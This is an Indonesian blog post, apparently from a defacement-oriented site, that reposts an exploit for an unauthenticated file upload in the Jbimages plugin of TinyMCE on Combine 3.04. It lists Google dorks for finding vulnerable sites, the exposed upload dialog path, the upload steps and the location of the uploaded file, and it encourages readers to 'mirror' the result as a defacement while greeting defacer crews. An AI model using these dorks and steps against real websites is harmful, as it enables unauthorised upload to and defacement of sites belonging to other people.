Home Exploit Tutorial Windows

Jbimages TinyMCE Combine 3.04 Vulnerability

Pixel-Code
Pixel-Code
Updated: 0 min read
Table of Contents
Hallo sobat pixel kali ini gue mau ngebagiin tutor exploit Jbimages TinyMCE Combine 3.04 Vulnerability, Yaa walaupun gue sendiri bukan defacer langsung aja step by stepnya:

[+]Exploit Title: Jbimages TinyMCE Combine 3.04 Vulnerability
[+]Author: ./Sn00py
[+]Team: N45HT
[+]Goolge Dork:
"index of jbimages/ site:"
"intext:Powered By combine.or.id site:"
[+]Tested on: Windows 10 pro
[+]Vendor: http://combine.or.id/
=======================================
[+]Proof Of Concept:
Dorking in google (Disini saya sudah memiliki target yaa)

[+]Exploit:
http://127.0.0.1/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
(kalian kasih exploit diatas maka tampilan akan berubah dan ada tombol upload)

Kalian upload file gambar kalian jika succes maka ada tulisan "Upload Complete"

[+]You can see the upload
http://127.0.0.1/assets/images/Your_image.jpg
(Dan boom berhasil, Tinggal mirror deh hehe >.<)

Gimana cukup mudah bukan?Oiya untuk dork kalian kembangin sendiri lagi yaa, Yakali maunya di manjain mulu hehe >.< Oke Mungkin cukup sekian, Dont forget to share see you byee~

source: https://cxsecurity.com/issue/WLB-2018060079

Greetz: Shinchan - ZEROONE-04 - ZakirDotID - RSFLT - N45HT - AllindonesiaDefacer

Post a Comment

✔ Centang "Beritahu Saya" atau "Notify Me" untuk mendapatkan notifikasi balasan komentar via Email.